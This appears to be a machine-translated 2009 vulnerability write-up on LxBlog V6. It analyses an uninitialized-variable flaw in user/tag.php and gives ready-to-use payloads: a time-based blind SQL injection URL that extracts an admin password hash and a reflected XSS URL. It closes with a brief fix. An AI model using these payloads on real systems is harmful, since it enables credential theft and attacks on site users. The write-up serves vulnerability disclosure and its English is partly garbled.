Analysis of LxBlog V6 variable is not initialized vulnerability-vulnerability warning-the black bar safety net

2009-03-17T00:00:00
ID MYHACK58:62200922552
Type myhack58
Reporter 佚名
Modified 2009-03-17T00:00:00

Description

Flyh4t http://bbs.wolvez.org

This article has been published in the hacker line of Defense,reproduced please signature

Lxblog is PHPWind development of a based on PHP+MySQL database platform architecture a multi-user blog system, the emphasis of the whole Station and the user inter-individual interaction, has a strong profile system, an independent secondary domain name system, flexible user template system, rich circle of friends, and photo album function. But the blog system in the security does not let people satisfaction, this article is to analyze the lxblog a variable is not initialized caused by thesql injectionvulnerabilities.

We start to analyze this vulnerability, see the code:

`/user/tag.php <? php ! function_exists('usermsg') && exit('Forbidden'); ! in_array($type,$item_type) && exit; //$type,$item_type are not initialized require_once(R_P.'mod/charset_mod.php'); foreach ($POST as $key => $value) { ${'utf8'.$ key} = $value; ${$key} = $db_charset != 'utf-8' ? convert_charset('utf-8',$db_charset,$value) : $value; }

if ($job == 'add') { ......// Omitted part of the code }elseif($job=="modify"){ $tagnum="{$type}num"; $touchtagdb=$db->get_one("SELECT k. tags,i. uid FROM pw_{$type} k LEFT JOIN pw_items i ON i. itemid=k. itemid WHERE k. itemid='$itemid'"); //$type into the query statement to operate the database $touchtagdb['uid']!=$ admin_uid && exit; ......// Omitted part of the code `

Of course, in the file the first line has ! function_exists('usermsg') && exit('Forbidden'); such code restrictions, we cannot directly access the file, but can be user_index. php to include the file implementation, see the specific code

`//user_index.php <? php ......// Omitted part of the code require_once(R_P.'user/global.php'); require_once(R_P.'user/top.php');

if (!$ action) { ......// Omitted part of the code } elseif ($action && file_exists(R_P."user/$action.php")) { $basename = "$user_file? action=$action"; require_once(Pcv(R_P."user/$action.php")); //By submitting$action=tag can be to call to the vulnerable file } ......// Omitted part of the code`

See this place, should have been able to trigger the vulnerability, but still have to take into account whether the subject register_global impact, but fortunately user_index. php in the beginning contains a user/global. php this file, take a look at this file provides us with what

//user/global.php &lt;? ......// Omitted part of the code if (! in_array($action,array('blogdata','comment','itemcp','post','userinfo'))) { //'blogdata','comment','itemcp','post','userinfo','global','top' //We submit the action=tag, not the top of the array inside, and can be triggered by the following code successfully bypass the register_global impact foreach ($_POST as $ _ key =&gt; $_value) { ! ereg dividing the ('^\_',$ _ key) && strlen (${$_key})&lt;1 & & ${$_key} = $_POST [$_key]; } foreach ($_GET as $ _ key =&gt; $_value) { ! ereg dividing the ('^\_',$ _ key) && strlen (${$_key})&lt;1 & & ${$_key} = $_GET [$_key]; } } ......// Omitted part of the code

Through the above analysis, we can successfully control$type,$item_type values, but also to pay attention to two places:

The first place was to meet in_array($type,$item_type), we pass directly to the$type and the$item_type[]assignment to the same variable

The second place is to pay attention to our injection statement

$touchtagdb=$db-&gt;get_one("SELECT k. tags,i. uid FROM pw_{$type} k LEFT JOIN pw_items i ON i. itemid=k. itemid WHERE k. itemid='$itemid'");

Based on the above, we constructed a blind of the code is as follows

//Determine the uid=1 User Password the first digit of the ASCII value is greater than 0 http://blog.xxx.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i. uid =1 AND if((ASCII(SUBSTRING(password,1,1))&gt;0),sleep(1 0),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i. uid =1 AND if((ASCII(SUBSTRING(password,1,1))&gt;0),sleep(1 0),1)/*

Returned through the browser time to determine whether the guess is correct, if it is correct, the browser returns to the slower, the approximate state of suspended animation, otherwise the return is relatively normal. Using the dichotomy of constantly guessing. In addition, if the database version is lower, you can use the benchmark function to the blinds, specifically the expliot is not provided, there is a need can write their own code to run, not what difficult thing.

In addition, we see lxblog the database fault-tolerant code

function DB_ERROR($msg) { global $db_blogname,$REQUEST_URI; $sqlerror = mysql_error(); $sqlerrno = mysql_errno(); //ob_end_clean(); echo"&lt;html&gt;&lt;head&gt;&lt;title&gt;$db_blogname&lt;/title&gt;&lt;style type='text/css'&gt;P,BODY{FONT-FAMILY:tahoma,arial,sans-serif;FONT-SIZE:11px;}A { TEXT-DECORATION: none;}a:hover{ text-decoration: underline;}TD { BORDER-RIGHT: 1px; BORDER-TOP: 0px; FONT-SIZE: 16pt; COLOR: #0 0 0 0 0 0;}&lt;/style&gt;&lt;body&gt;\n\n"; echo"&lt;table style='TABLE-LAYOUT:fixed;WORD-WRAP: break-word'&gt;&lt;tr&gt;&lt;td&gt;$msg"; echo"&lt;br&gt;&lt;br&gt;&lt;b&gt;The URL Is&lt;/b&gt;:&lt;br&gt;http://$_SERVER[HTTP_HOST]$REQUEST_URI"; echo"&lt;br&gt;&lt;br&gt;&lt;b&gt;MySQL Server Error&lt;/b&gt;:&lt;br&gt;$sqlerror ( $sqlerrno )"; echo"&lt;br&gt;&lt;br&gt;&lt;b&gt;You Can Get Help In&lt;/b&gt;:&lt;br&gt;&lt;a target=_blank href=http://www. phpwind. net&gt;&lt;b&gt;http://www.phpwind.net&lt;/b&gt;&lt;/a&gt;"; echo"&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;"; exit; }

Function directly will cause a database error in the url returned to the client, to the output without any filtering, resulting in axssvulnerabilities, the following is my official test:

http://www.lxblog.net/user_index.php?action=tag&job=modify&type=&lt;script&gt;alert(/xss/)&lt;/script&gt;&item_type[]=&lt;script&gt;alert(/xss/)&lt;/script&gt;

Lxblog the vulnerability analysis to here, this bug fix is also very simple, as long as the database query statement in front of the variable$item_type assigned the value of the specified array. Online of the PHP app has a lot of both there is a similar vulnerability, since the variable is not correctly initialized, causing the attacker can control variable is changed the program flow executionSome of the illegal operation. In fact, this problem is not complex, keep a good coding habit, to properly initialize the class and variables can be put an end to such vulnerabilities.